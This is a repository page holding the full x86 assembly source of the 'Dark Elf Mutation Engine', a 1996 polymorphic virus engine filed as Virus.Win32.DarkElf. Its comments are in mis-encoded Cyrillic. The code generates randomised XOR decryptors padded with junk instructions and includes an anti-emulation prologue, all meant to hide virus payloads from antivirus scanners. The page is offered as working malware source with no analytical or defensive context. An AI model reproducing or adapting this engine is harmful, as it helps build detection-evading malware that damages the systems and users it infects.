-
Notifications
You must be signed in to change notification settings - Fork 33
/
Copy pathVirus.Win32.DarkElf.asm
821 lines (745 loc) · 12.9 KB
/
Virus.Win32.DarkElf.asm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
; ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
; ³ Dark Elf Mutation Engine [DEME] v1.1 CopyLeft (cl) MSTUdent 1996 ³
; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
;
;¯®¤¯à®£à ¬¬ë :
; DEME - á ¬ Mutation ¨ ¥áâì
; Randomize - î§ ¥â ¯®àâ 40h
; RND - AX = RND(65536)
PUSHSTATE
IDEAL
LOCALS @@
DEME_MaxDecoderLen=1500
proc DEME
; à ¬¥âàë :
;es:di - ¤à¥á ¡ãä¥à , ¢ ª®â®àë© ¡ã¤¥â § ¯¨á १ã«ìâ â
; à §¬¥à_¡ãä¥à = à §¬¥à_¨á室®£®_ª®¤ + 1500
;ds:si - ¤à¥á ª®¤ , ª®â®àë© ¥®¡å®¤¨¬® § è¨ä஢ âì
;dx - ¤à¥á ¯à¨¢ï§ª¨ à áè¨ä஢騪 (¯®¤®¡® ORG xxxx)
;bx - à §¬¥à ¨á室®£® ª®¤ (¢ ¡ ©â å)
;‚®§¢à é ¥â :
;cx - ¤«¨ ¯®«ã祮£® ª®¤ (¢ ¡ ©â å)
pushf
push bx di si ds
push cs
pop ds
cld
inc bx
shr bx,1
mov [DEME_CodeLen],bx
mov [DEME_Origin],dx
mov [DEME_BuffOffs],di
call Randomize
call DEME_ChooseRegs
call DEME_GenProlog
call DEME_GenCrypt
call DEME_GenEpilog
pop ds si
call DEME_Encode
mov cx,di
pop di bx
sub cx,di
popf
ret
endp DEME
R_AX=00000000b
R_CX=00000001b
R_DX=00000010b
R_BX=00000011b
R_SP=00000100b
R_BP=00000101b
R_SI=00000110b
R_DI=00000111b
M_AX=00000001b
M_CX=00000010b
M_DX=00000100b
M_BX=00001000b
M_SP=00010000b
M_BP=00100000b
M_SI=01000000b
M_DI=10000000b
M_INDEX=M_BX+M_SI+M_DI
M_ALL=M_AX+M_CX+M_DX+M_BX+M_BP+M_SI+M_DI
DEME_ID db '[DEME] Dark Elf Mutation Engine v1.1',0
DEME_CopyLeft db 'CopyLeft (cl) MSTUdent',0
DEME_Date db ??date,0,??time,0
proc DEME_Encode near
push ax bx cx dx si
mov cx,[DEME_CodeLen]
mov dx,[DEME_Key]
@@1:
lodsw
xor ax,dx
stosw
add dx,[DEME_KeyAdd]
loop @@1
pop si dx cx bx ax
ret
endp DEME_Encode
proc DEME_ChooseRegs near
push ax
mov [DEME_MaskUsed],M_SP
mov al,M_INDEX
call DEME_GetAnyReg
mov [DEME_RegIndex],ax
mov al,M_ALL
call DEME_GetAnyReg
mov [DEME_RegCounter],ax
mov al,M_ALL
call DEME_GetAnyReg
mov [DEME_RegKey],ax
pop ax
ret
endp DEME_ChooseRegs
proc DEME_GenProlog near
push ax bx cx dx
call DEME_GenRandomSeq
call DEME_GenAntiWeb
mov bx,offset DEME_GenLoadIndex
mov cx,offset DEME_GenLoadKey
mov dx,offset DEME_GenLoadCounter
call DEME_MixRegs
call DEME_GenRandomSeq
call bx
call DEME_GenRandomSeq
call dx
call DEME_GenRandomSeq
call cx
call DEME_GenRandomSeq
pop dx cx bx ax
ret
endp DEME_GenProlog
proc DEME_GenAntiWeb
push ax bx cx
mov cl,[DEME_MaskUsed]
test cl,M_AX
je @@1
mov al,050h
stosb
call DEME_GenRandomSeq
@@1:
or [DEME_MaskUsed],M_AX
mov ax,41e4h
stosw
call DEME_GenRandomSeq
mov ax,1100010010001000b
stosw
call DEME_GenRandomSeq
mov ax,41e4h
stosw
call DEME_GenRandomSeq
mov ax,1100010000110000b
stosw
mov al,01110101b
stosw
mov bx,di
call DEME_GenRandomSeq
mov ax,4cb4h
stosw
mov ax,21cdh
stosw
call DEME_GenRandomSeq
mov ax,di
sub ax,bx
mov [es:bx-1],al
test cl,M_AX
je @@2
mov al,058h
stosb
call DEME_GenRandomSeq
@@2:
mov [DEME_MaskUsed],cl
pop cx bx ax
ret
endp DEME_GenAntiWeb
proc DEME_GenLoadIndex near
push ax
mov ax,[DEME_RegIndex]
or al,10111000b
stosb
mov [DEME_AddrBeg],di
stosw
pop ax
ret
endp DEME_GenLoadIndex
proc DEME_GenLoadKey near
push ax bx
call RND
mov bx,ax
mov [DEME_Key],ax
mov ax,[DEME_RegKey]
call DEME_GenLoadReg16
pop bx ax
ret
endp DEME_GenLoadKey
proc DEME_GenLoadCounter near
push ax bx
mov ax,[DEME_RegCounter]
mov bx,[DEME_CodeLen]
call DEME_GenLoadReg16
pop bx ax
ret
endp DEME_GenLoadCounter
proc DEME_GenCrypt near
push ax bx cx dx
mov [DEME_LoopAddr],di
call DEME_GenRandomSeq
call DEME_GenXorCmd
mov dx,offset DEME_GenIncIndex
mov bx,offset DEME_GenAddKey
mov cx,offset DEME_GenDecCounter
call DEME_MixRegs
call DEME_GenRandomSeq
call bx
call DEME_GenRandomSeq
call dx
call DEME_GenRandomSeq
call cx
call DEME_GenRandomSeq
call DEME_GenCloseCycle
call DEME_GenRandomSeq
pop dx cx bx ax
ret
endp DEME_GenCrypt
proc DEME_GenXorCmd near
push ax bx
mov al,2eh
stosb
mov al,00110001b
stosb
mov bx,[DEME_RegIndex]
cmp bx,R_BX
jne @@1
mov al,00000111b
@@1:
cmp bx,R_SI
jne @@2
mov al,00000100b
@@2:
cmp bx,R_DI
jne @@3
mov al,00000101b
@@3:
mov bx,[DEME_RegKey]
shl bl,3
or al,bl
stosb
pop bx ax
ret
endp DEME_GenXorCmd
proc DEME_GenIncIndex near
push ax bx
mov bx,[DEME_RegIndex]
call RND
and ax,3
or al,al
jne @@1
mov al,01000000b
or al,bl
stosb
stosb
jmp @@Exit
@@1:
dec al
jne @@2
mov al,10000001b
stosb
mov al,11000000b
or al,bl
stosb
mov ax,2
stosw
jmp @@Exit
@@2:
dec al
jne @@3
mov al,10000001b
stosb
mov al,11101000b
or al,bl
stosb
mov ax,-2
stosw
jmp @@Exit
@@3:
call DEME_GetUnusedReg
mov bx,2
call DEME_GenLoadReg16
mov bx,[DEME_RegIndex]
mov bh,al
shl bh,3
mov al,00000001b
stosb
mov al,11000000b
or al,bl
or al,bh
stosb
@@Exit:
pop bx ax
ret
endp DEME_GenIncIndex
proc DEME_GenAddKey near
push ax bx
mov bx,[DEME_RegKey]
call RND
mov [DEME_KeyAdd],ax
push ax
call RND
xor ah,ah
test al,00000100b
je @@1
neg [DEME_KeyAdd]
mov ah,00101000b
@@1:
mov al,10000001b
stosb
mov al,11000000b
xor al,ah
or al,bl
stosb
pop ax
stosw
@@Exit:
pop bx ax
ret
endp DEME_GenAddKey
proc DEME_GenDecCounter near
push ax bx
mov bx,[DEME_RegCounter]
call RND
and ax,3
or al,al
jne @@1
mov al,01001000b
or al,bl
stosb
jmp @@Exit
@@1:
dec al
jne @@2
mov al,10000001b
stosb
mov al,11000000b
or al,bl
stosb
mov ax,-1
stosw
jmp @@Exit
@@2:
dec al
jne @@3
mov al,10000001b
stosb
mov al,11101000b
or al,bl
stosb
mov ax,1
stosw
jmp @@Exit
@@3:
call DEME_GetUnusedReg
mov bx,1
call DEME_GenLoadReg16
mov bx,[DEME_RegCounter]
mov bh,al
shl bh,3
mov al,00101001b
stosb
mov al,11000000b
or al,bl
or al,bh
stosb
@@Exit:
pop bx ax
ret
endp DEME_GenDecCounter
proc DEME_GenCloseCycle near
push ax bx cx dx
call RND
and ax,3
shl ax,1
mov bx,ax
call [DEME_Clos1Tbl+bx]
call RND
test al,1
je @@1
mov al,10011100b
stosb
call DEME_GenRandomSeq
mov al,10011101b
stosb
@@1:
call [DEME_Clos2Tbl+bx]
call DEME_GenRandomSeq
call DEME_ClosJmp
call DEME_GenRandomSeq
call DEME_ClosJmpShort
call DEME_GenRandomSeq
pop dx cx bx ax
ret
endp DEME_GenCloseCycle
DEME_Clos1Tbl dw offset DEME_Clos11
dw offset DEME_Clos12
dw offset DEME_Clos13
dw offset DEME_Clos14
DEME_Clos2Tbl dw offset DEME_Clos21
dw offset DEME_Clos22
dw offset DEME_Clos21
dw offset DEME_Clos21
proc DEME_Clos11 near
push ax bx
mov al,10000001b
stosb
mov ax,[DEME_RegCounter]
or al,11111000b
stosb
xor ax,ax
stosw
pop bx ax
ret
endp DEME_Clos11
proc DEME_Clos12 near
push ax bx
mov al,10000001b
stosb
mov ax,[DEME_RegCounter]
or al,11111000b
stosb
xor ax,ax
inc ax
stosw
pop bx ax
ret
endp DEME_Clos12
proc DEME_Clos13 near
push ax bx
mov al,00001001b
stosb
mov ax,[DEME_RegCounter]
mov ah,11000000b
or ah,al
shl al,3
or al,ah
stosb
pop bx ax
ret
endp DEME_Clos13
proc DEME_Clos14 near
push ax bx
mov al,11110111b
stosb
mov ax,[DEME_RegCounter]
or al,11000000b
stosb
xor ax,ax
dec ax
stosw
pop bx ax
ret
endp DEME_Clos14
proc DEME_Clos21 near
push ax
mov al,01110100b
stosb
mov [DEME_JmpShort],di
stosb
pop ax
ret
endp DEME_Clos21
proc DEME_Clos22 near
push ax
mov al,01110010b
stosb
mov [DEME_JmpShort],di
stosb
pop ax
ret
endp DEME_Clos22
proc DEME_ClosJmp near
push ax
mov al,11101001b
stosb
mov ax,[DEME_LoopAddr]
sub ax,di
dec ax
dec ax
stosw
pop ax
ret
endp DEME_ClosJmp
proc DEME_ClosJmpShort near
push ax bx
mov ax,di
mov bx,[DEME_JmpShort]
sub ax,bx
dec ax
mov [es:bx],al
pop bx ax
ret
endp DEME_ClosJmpShort
proc DEME_GenEpilog near
push ax bx dx
call RND
and ax,3fh
inc ax
@@1:
call DEME_GenTrash
dec ax
jnz @@1
mov bx,[DEME_AddrBeg]
mov dx,di
sub dx,[DEME_BuffOffs]
add dx,[DEME_Origin]
mov [es:bx],dx
pop dx bx ax
ret
endp DEME_GenEpilog
proc DEME_MixRegs near
push ax
call RND
test al,1
je @@1
xchg bx,cx
@@1:
test al,2
je @@2
xchg cx,dx
@@2:
test al,4
je @@3
xchg bx,dx
@@3:
pop ax
ret
endp DEME_MixRegs
proc Randomize near
push ax
in ax,40h
mov [seed1],ax
pop ax
ret
endp Randomize
proc RND near
push dx
mov ax,[seed]
xor ax,[seed1]
mul ax
mov al,dl
mov [seed],ax
pop dx
ret
endp RND
;ƒ¥¥à æ¨ï ª®¬ ¤
proc DEME_GenRandomSeq near
;ƒ¥¥à¨â ªãçã ¬ãá®à
push ax
call RND
and ax,0fh
inc ax
@@1:
call DEME_GenTrash
dec ax
jnz @@1
pop ax
ret
endp DEME_GenRandomSeq
proc DEME_GenTrash near
;ƒ¥¥à¨â '¬ãá®àãî' ª®¬ ¤ã
push ax bx
call RND
and ax,3
shl ax,1
mov bx,ax
call [DEME_TrashTbl+bx]
pop bx ax
ret
endp DEME_GenTrash
DEME_TrashTbl dw offset DEME_GenCmd1
dw offset DEME_GenCmd2
dw offset DEME_GenCmd3
dw offset DEME_GenCmd4
proc DEME_GenCmd1 near
;ƒ¥¥à¨â 1-¡ ©â®¢ãî «¥¢¥©èãî ª®¬ ¤ã ¨§¢à é îéãî AX
ret
push ax bx
test [DEME_MaskUsed],M_AX
jne @@Exit
call RND
and ax,7
mov bx,ax
mov al,[DEME_Cmds1+bx]
stosb
@@Exit:
pop bx ax
ret
endp DEME_GenCmd1
DEME_Cmds1 db 00110111b ;aaa
db 00111111b ;aas
db 10011000b ;cbw
db 00100111b ;daa
db 00101111b ;das
db 01001000b ;dec ax
db 01000000b ;inc ax
db 10011111b ;lahf
proc DEME_GenCmd2 near
;ƒ¥¥à¨â 1-®¯¥à ¤ãî ª®¬ ¤ã
push ax bx
call RND
and ax,0fh
mov bx,ax
shl bx,1
mov al,[DEME_Cmds2+bx]
stosb
mov bl,[DEME_Cmds2+bx+1]
call DEME_GetUnusedReg
or al,bl
stosb
pop bx ax
ret
endp DEME_GenCmd2
DEME_Cmds2 db 0d1h,11000000b ;rol
db 0d1h,11001000b ;ror
db 0d1h,11010000b ;rcl
db 0d1h,11011000b ;rcr
db 0d1h,11100000b ;shl
db 0d1h,11101000b ;shr
db 0ffh,11000000b ;inc
db 0ffh,11001000b ;dec
db 0f7h,11010000b ;not
db 0f7h,11011000b ;neg
db 0d3h,11000000b ;rol cl
db 0d3h,11001000b ;ror cl
db 0d3h,11010000b ;rcl cl
db 0d3h,11011000b ;rcr cl
db 0d3h,11100000b ;shl cl
db 0d3h,11101000b ;shr cl
proc DEME_GenCmd3 near
;ƒ¥¥à¨â 2-å ®¯¥à ¤ãî ª®¬ ¤ã á ¥¯®á।áâ¢¥ë¬ § 票¥¬
push ax bx
mov al,[DEME_MaskUsed]
push ax
or [DEME_MaskUsed],M_AX ;„«ï AX ª®¤ë ª®¬ ¤ ¤à㣨¥
call RND
xor ah,ah
mov bl,9
div bl
mov bl,ah
xor bh,bh
shl bx,1
mov al,[DEME_Cmds3+bx]
stosb
mov bl,[DEME_Cmds3+bx+1]
call DEME_GetUnusedReg
or al,bl
stosb
call RND
stosw
pop ax
mov [DEME_MaskUsed],al
pop bx ax
ret
endp DEME_GenCmd3
DEME_Cmds3 db 081h,11000000b ;add
db 081h,11010000b ;adc
db 081h,11101000b ;sub
db 081h,11110000b ;xor
db 0f7h,11000000b ;test
db 081h,11011000b ;sbb
db 081h,11001000b ;or
db 081h,11111000b ;cmp
db 081h,11100000b ;and
; db 0c7h,11000000b ;mov
proc DEME_GenCmd4 near
;ƒ¥¥à¨â 2-å ®¯¥à ¤ãî ª®¬ ¤ã
push ax bx cx dx
call RND
xor ah,ah
mov bl,10
div bl
mov bl,ah
xor bh,bh
mov al,[DEME_Cmds4+bx]
stosb
call DEME_GetUnusedReg
shl al,3
mov dl,al
call RND
and al,00000111b
or al,11000000b
or al,dl
stosb
pop dx cx bx ax
ret
endp DEME_GenCmd4
DEME_Cmds4 db 003h ;add
db 013h ;adc
db 02bh ;sub
db 033h ;xor
db 085h ;test
db 01bh ;sbb
db 00bh ;or
db 03bh ;cmp
db 023h ;and
db 08bh ;mov
proc DEME_GetUnusedReg near
;‚®§¢à é ¥â ¥¨á¯®«ì§ã¥¬ë© ॣ¨áâà (¤«ï ¬ãá®à )
push bx
mov bl,[DEME_MaskUsed]
mov al,M_ALL
call DEME_GetAnyReg
mov [DEME_MaskUsed],bl
pop bx
ret
endp DEME_GetUnusedReg
proc DEME_GetAnyReg near
;‚®§¢à é ¥â ¥¨á¯®«ì§ã¥¬ë© ॣ¨áâà ¨§ ®¯à¥¤¥«¥®© £à㯯ë
push bx cx
mov bl,al
not bl
or bl,[DEME_MaskUsed]
call RND
and ax,7
mov cl,al
mov ah,1
rol ah,cl
@@11:
test ah,bl
je @@12
inc al
and al,7
rol ah,1
jmp @@11
@@12:
or [DEME_MaskUsed],ah
and ax,7
pop cx bx
ret
endp DEME_GetAnyReg
proc DEME_GenLoadReg16 near
;ƒ¥¥à¨â § £à㧪ã ॣ¨áâà
;ax - ª ª®£®
;bx - 祬
push ax bx
and al,00000111b
or al,10111000b
stosb
mov ax,bx
stosw
pop bx ax
ret
endp DEME_GenLoadReg16
Seed dw 0
Seed1 dw 0
DEME_MaskUsed db 0
DEME_RegIndex dw 0
DEME_RegCounter dw 0
DEME_RegKey dw 0
DEME_Origin dw 0
DEME_BuffOffs dw 0
DEME_LoopAddr dw 0
DEME_JmpShort dw 0
DEME_CodeLen dw 0
DEME_Key dw 0
DEME_KeyAdd dw 0
DEME_AddrBeg dw 0
POPSTATE